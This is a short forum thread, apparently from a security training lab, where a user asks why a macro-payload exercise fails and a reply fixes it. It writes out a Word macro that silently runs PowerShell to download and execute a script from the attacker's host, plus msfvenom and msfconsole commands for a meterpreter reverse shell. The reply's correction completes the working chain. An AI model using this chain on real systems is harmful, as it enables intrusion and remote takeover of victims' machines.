Forum Discussion

justajolt's avatar
justajolt
Icon for Bronze I rankBronze I
2 months ago

Weaponization: Payloads – Office Macros

I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes. 

1. I've created a macro enabled word doc with the following vb code on windows machine:

Sub Document_Open()

    Dim ps as String

    ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')"

    process = Shell(ps, vbhide)

    End Sub

2. python3 -m http.server to start server to serve shell.ps1 on request
 
3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for
 
4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener
 
5. back on windows machine, go to target_ip:8888, browse to macro doc, submit and execute. 
 
What am I missing?
  • Hi justajolt thanks for reaching out! We've checked the lab, and it's working correctly - looking at your progress, the payloads used for msfvenom and msfsconole need to match. At the minute, you are using windows/x64/meterpreter/reverse_tcp for msfvenom and windows/meterpreter/reverse_tcp for msfconole, when you should be using windows/x64/meterpreter/reverse_tcp for both. This should resolve the issueπŸ‘